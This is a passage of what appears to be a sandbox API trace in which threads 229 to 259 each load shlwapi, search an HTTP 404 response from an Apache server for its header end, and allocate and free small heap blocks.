returned 0x690000 [0228.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0228.212] GetProcessHeap () returned 0x690000 [0228.213] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 229 os_tid = 0x6d4 [0228.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.418] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:33 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0228.418] GetProcessHeap () returned 0x690000 [0228.418] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0228.418] GetProcessHeap () returned 0x690000 [0228.418] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0228.418] GetProcessHeap () returned 0x690000 [0228.419] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 230 os_tid = 0xbc0 [0228.631] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.631] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:33 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0228.631] GetProcessHeap () returned 0x690000 [0228.631] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0228.631] GetProcessHeap () returned 0x690000 [0228.631] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0228.632] GetProcessHeap () returned 0x690000 [0228.632] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 231 os_tid = 0xfe0 [0228.807] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.858] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:34 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0228.858] GetProcessHeap () returned 0x690000 [0228.858] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0228.858] GetProcessHeap () returned 0x690000 [0228.858] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0228.858] GetProcessHeap () returned 0x690000 [0228.859] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 232 os_tid = 0x12e8 [0228.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.985] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:34 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0228.985] GetProcessHeap () returned 0x690000 [0228.985] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0228.985] GetProcessHeap () returned 0x690000 [0228.985] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0228.985] GetProcessHeap () returned 0x690000 [0228.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 233 os_tid = 0x132c [0229.193] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.194] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:34 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0229.194] GetProcessHeap () returned 0x690000 [0229.194] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0229.194] GetProcessHeap () returned 0x690000 [0229.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0229.194] GetProcessHeap () returned 0x690000 [0229.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 234 os_tid = 0x874 [0229.357] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.358] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:34 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0229.358] GetProcessHeap () returned 0x690000 [0229.358] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0229.358] GetProcessHeap () returned 0x690000 [0229.358] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0229.358] GetProcessHeap () returned 0x690000 [0229.359] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 235 os_tid = 0xfc0 [0229.526] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.526] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:34 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0229.526] GetProcessHeap () returned 0x690000 [0229.526] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0229.526] GetProcessHeap () returned 0x690000 [0229.527] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0229.527] GetProcessHeap () returned 0x690000 [0229.527] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 236 os_tid = 0xee8 [0229.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.726] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:34 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0229.726] GetProcessHeap () returned 0x690000 [0229.726] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0229.726] GetProcessHeap () returned 0x690000 [0229.726] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0229.726] GetProcessHeap () returned 0x690000 [0229.727] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 237 os_tid = 0x750 [0229.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.891] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:35 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0229.891] GetProcessHeap () returned 0x690000 [0229.891] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0229.891] GetProcessHeap () returned 0x690000 [0229.891] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0229.891] GetProcessHeap () returned 0x690000 [0229.891] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 238 os_tid = 0x76c [0230.093] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.093] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:35 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0230.093] GetProcessHeap () returned 0x690000 [0230.093] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0230.093] GetProcessHeap () returned 0x690000 [0230.093] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0230.093] GetProcessHeap () returned 0x690000 [0230.094] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 239 os_tid = 0xb0 [0230.342] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.343] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:35 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0230.343] GetProcessHeap () returned 0x690000 [0230.343] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0230.343] GetProcessHeap () returned 0x690000 [0230.343] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0230.343] GetProcessHeap () returned 0x690000 [0230.344] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 240 os_tid = 0xfb0 [0230.599] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.599] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:35 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0230.603] GetProcessHeap () returned 0x690000 [0230.603] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0230.603] GetProcessHeap () returned 0x690000 [0230.603] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0230.604] GetProcessHeap () returned 0x690000 [0230.604] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 241 os_tid = 0x13c [0230.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.790] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:36 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0230.790] GetProcessHeap () returned 0x690000 [0230.790] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0230.790] GetProcessHeap () returned 0x690000 [0230.790] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0230.790] GetProcessHeap () returned 0x690000 [0230.791] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 242 os_tid = 0xc78 [0231.312] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.312] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:36 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0231.312] GetProcessHeap () returned 0x690000 [0231.312] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0231.312] GetProcessHeap () returned 0x690000 [0231.312] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0231.313] GetProcessHeap () returned 0x690000 [0231.313] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 243 os_tid = 0xf14 [0231.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.498] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:36 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0231.498] GetProcessHeap () returned 0x690000 [0231.498] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0231.498] GetProcessHeap () returned 0x690000 [0231.498] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0231.498] GetProcessHeap () returned 0x690000 [0231.499] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 244 os_tid = 0xc20 [0231.732] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.732] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:36 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0231.732] GetProcessHeap () returned 0x690000 [0231.732] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0231.732] GetProcessHeap () returned 0x690000 [0231.732] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0231.732] GetProcessHeap () returned 0x690000 [0231.733] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 245 os_tid = 0xd18 [0231.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.925] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0231.925] GetProcessHeap () returned 0x690000 [0231.925] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0231.925] GetProcessHeap () returned 0x690000 [0231.925] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0231.925] GetProcessHeap () returned 0x690000 [0231.926] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 246 os_tid = 0xe2c [0232.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0232.289] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0232.289] GetProcessHeap () returned 0x690000 [0232.289] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0232.289] GetProcessHeap () returned 0x690000 [0232.289] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0232.289] GetProcessHeap () returned 0x690000 [0232.289] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 247 os_tid = 0x6f8 [0232.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0232.582] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0232.582] GetProcessHeap () returned 0x690000 [0232.582] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0232.582] GetProcessHeap () returned 0x690000 [0232.582] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0232.582] GetProcessHeap () returned 0x690000 [0232.583] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 248 os_tid = 0xe74 [0236.347] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0236.347] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0236.347] GetProcessHeap () returned 0x690000 [0236.347] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0236.347] GetProcessHeap () returned 0x690000 [0236.347] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0236.347] GetProcessHeap () returned 0x690000 [0236.348] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 249 os_tid = 0xa04 [0237.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.207] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0237.207] GetProcessHeap () returned 0x690000 [0237.207] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0237.207] GetProcessHeap () returned 0x690000 [0237.207] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0237.207] GetProcessHeap () returned 0x690000 [0237.208] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 250 os_tid = 0x988 [0237.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.422] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0237.422] GetProcessHeap () returned 0x690000 [0237.422] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0237.422] GetProcessHeap () returned 0x690000 [0237.422] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0237.423] GetProcessHeap () returned 0x690000 [0237.423] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 251 os_tid = 0x688 [0237.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.656] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0237.657] GetProcessHeap () returned 0x690000 [0237.657] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0237.657] GetProcessHeap () returned 0x690000 [0237.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0237.657] GetProcessHeap () returned 0x690000 [0237.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 252 os_tid = 0x114c [0237.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.866] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0237.866] GetProcessHeap () returned 0x690000 [0237.866] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0237.866] GetProcessHeap () returned 0x690000 [0237.866] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0237.866] GetProcessHeap () returned 0x690000 [0237.867] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 253 os_tid = 0x5a0 [0238.059] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.060] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0238.060] GetProcessHeap () returned 0x690000 [0238.060] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0238.060] GetProcessHeap () returned 0x690000 [0238.060] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0238.060] GetProcessHeap () returned 0x690000 [0238.060] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 254 os_tid = 0x4c4 [0238.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.251] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0238.252] GetProcessHeap () returned 0x690000 [0238.252] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0238.252] GetProcessHeap () returned 0x690000 [0238.252] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0238.252] GetProcessHeap () returned 0x690000 [0238.252] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 255 os_tid = 0x58c [0238.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.422] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0238.422] GetProcessHeap () returned 0x690000 [0238.422] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0238.422] GetProcessHeap () returned 0x690000 [0238.422] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0238.422] GetProcessHeap () returned 0x690000 [0238.423] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 256 os_tid = 0xd14 [0238.751] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.751] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0238.751] GetProcessHeap () returned 0x690000 [0238.751] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0238.751] GetProcessHeap () returned 0x690000 [0238.751] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0238.751] GetProcessHeap () returned 0x690000 [0238.752] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 257 os_tid = 0xda4 [0238.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.952] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0238.952] GetProcessHeap () returned 0x690000 [0238.952] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0238.952] GetProcessHeap () returned 0x690000 [0238.952] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0238.952] GetProcessHeap () returned 0x690000 [0238.953] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 258 os_tid = 0xf94 [0239.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.186] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0239.186] GetProcessHeap () returned 0x690000 [0239.186] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0239.186] GetProcessHeap () returned 0x690000 [0239.186] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0239.186] GetProcessHeap () returned 0x690000 [0239.186] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 259 os_tid = 0xf4c [0239.368] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.369] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0239.369] GetProcessHeap () returned 0x690000 [0239.369] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, 